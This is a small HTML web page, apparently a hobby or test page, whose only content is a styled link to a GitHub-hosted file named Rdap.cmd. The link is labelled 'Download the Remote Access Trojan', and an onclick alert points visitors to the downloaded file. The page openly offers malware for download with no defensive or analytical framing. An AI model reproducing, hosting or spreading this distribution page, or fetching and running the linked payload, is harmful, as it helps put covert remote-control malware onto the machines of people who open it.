<!DOCTYPE html>
<html>
<head>
<title>Remote-Desktop-Trojan Page</title>
<style>
body {
 margin: 0px;
 }
.pad {
  padding: 25px;
}
.header {
 background-color: lightgreen;
 color: blue;
height: 100px;
font-size: 36pt;
text-align:center
}
a:link {
  color: blue;
  background-color: transparent;
  text-decoration: none;
}

a:visited {
  color: blue;
  background-color: transparent;
  text-decoration: none;
}

a:hover {
  color: red;
  background-color: transparent;
  text-decoration: underline;
}

a:active {
  color: yellow;
  background-color: transparent;
  text-decoration: underline;
}
</style>
</head>
<body>
<div class="header pad">
Home Page
</div>
<a href="https://github.com/adhi44/Remote-Access-Trojan/raw/main/Rdap.cmd" onclick="alert('Downloading Remote-Acess-Trojan(look for rdap.cmd/exe file in you downloads folder)');">
Download the Remote Access Trojan
</a>
</body>
</html>
